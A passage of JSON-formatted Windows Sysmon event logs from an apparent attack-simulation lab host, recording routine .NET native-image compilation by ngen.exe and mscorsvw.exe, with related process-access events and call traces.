{"EventTime":"2020-08-01 05:58:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7351,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:59.324\r\nProcessGuid: {A837DB8D-04A2-5F25-0000-001038B20F00}\r\nProcessId: 2764\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\acc-0\\System.Activities.DurableInstancing.dll\r\nCreationUtcTime: 2020-08-01 05:58:59.324","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:59.324","ProcessGuid":"{A837DB8D-04A2-5F25-0000-001038B20F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\acc-0\\System.Activities.DurableInstancing.dll","CreationUtcTime":"2020-08-01 05:58:59.324","EventReceivedTime":"2020-08-01 05:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7352,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:59.371\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-0010B8540D00}\r\nTargetProcessId: 3008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:59.371","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-0010B8540D00}","TargetProcessId":"3008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7353,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:59.371\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-0010B8540D00}\r\nTargetProcessId: 3008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:59.371","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-0010B8540D00}","TargetProcessId":"3008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7354,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:59.371\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-0010B8540D00}\r\nTargetProcessId: 3008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:59.371","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-0010B8540D00}","TargetProcessId":"3008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7355,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:59.574\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04A3-5F25-0000-0010FBC00F00}\r\nTargetProcessId: 3928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:59.574","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04A3-5F25-0000-0010FBC00F00}","TargetProcessId":"3928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7356,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:59.574\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04A3-5F25-0000-0010FBC00F00}\r\nTargetProcessId: 3928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:59.574","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04A3-5F25-0000-0010FBC00F00}","TargetProcessId":"3928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7357,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:59.590\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04A3-5F25-0000-0010FBC00F00}\r\nTargetProcessId: 3928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:59.590","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04A3-5F25-0000-0010FBC00F00}","TargetProcessId":"3928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7358,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:03.449\r\nProcessGuid: {A837DB8D-04A3-5F25-0000-0010FBC00F00}\r\nProcessId: 3928\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f58-0\\System.Activities.Presentation.dll\r\nCreationUtcTime: 2020-08-01 05:59:03.449","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:03.449","ProcessGuid":"{A837DB8D-04A3-5F25-0000-0010FBC00F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f58-0\\System.Activities.Presentation.dll","CreationUtcTime":"2020-08-01 05:59:03.449","EventReceivedTime":"2020-08-01 05:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7359,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:03.574\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-001048600D00}\r\nTargetProcessId: 1160\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:03.574","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-001048600D00}","TargetProcessId":"1160","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\